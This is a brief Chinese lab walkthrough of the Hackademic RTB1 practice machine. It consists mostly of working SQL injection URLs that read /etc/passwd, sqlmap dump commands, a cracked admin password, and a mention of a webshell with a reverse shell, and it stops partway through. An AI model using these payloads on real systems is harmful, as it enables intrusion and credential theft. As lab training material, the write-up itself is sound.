RTB1靶机 - 润新知

RTB1靶机

一、信息收集

信息收集

http://192.168.111.132/Hackademic_RTB1/?cat=1

http://192.168.111.132/Hackademic_RTB1/?cat=1%27

http://192.168.111.132/Hackademic_RTB1/?cat=1%20order%20by%201

http://192.168.111.132/Hackademic_RTB1/?cat=1%20order%20by%206

http://192.168.111.132/Hackademic_RTB1/?cat=1%20union%20select%201,2,3,4,5

http://192.168.111.132/Hackademic_RTB1/?cat=1%20and%201=1%20union%20select%201,2,3,4,5

http://192.168.111.132/Hackademic_RTB1/?cat=1%20and%201=2%20union%20select%201,2,3,4,5

http://192.168.111.132/Hackademic_RTB1/?cat=1%20and%201=2%20union%20select%201,@@version,3,4,5

http://192.168.111.132/Hackademic_RTB1/?cat=1 and 1=2 union select 1,group_concat(schema_name),3,4,5 from information_schema.schemata

http://192.168.111.132/Hackademic_RTB1/?cat=1 and 1=2 union select 1,load_file(‘/etc/passwd’),3,4,5 from mysql.user

或者sqlmap

sqlmap -u http://192.168.111.132/Hackademic_RTB1/?cat=1 --dbs

sqlmap -u http://192.168.111.132/Hackademic_RTB1/?cat=1 --dbs --batch --dump

使用md5进行解密

账户登录GeorgeMiller权限最高

GeorgeMiller q1w2e3

进入后台页面

蚁剑连接并且反弹到kali

上传文件

编译失败

继续寻找
相关阅读:
mongodb实验
 hbase实验
 oracle数据库的安装
 3ds的fbi无线传输
 2018年春阅读计划---阅读笔记6
2018年春阅读计划---阅读笔记5
2018年春阅读计划---阅读笔记4
php写一个简单的计算器
 2018年春阅读计划---阅读笔记3
脚本之家的一个meta的帖子
原文地址：https://www.cnblogs.com/bingtang123/p/13321883.html

Copyright © 2020-2023 润新知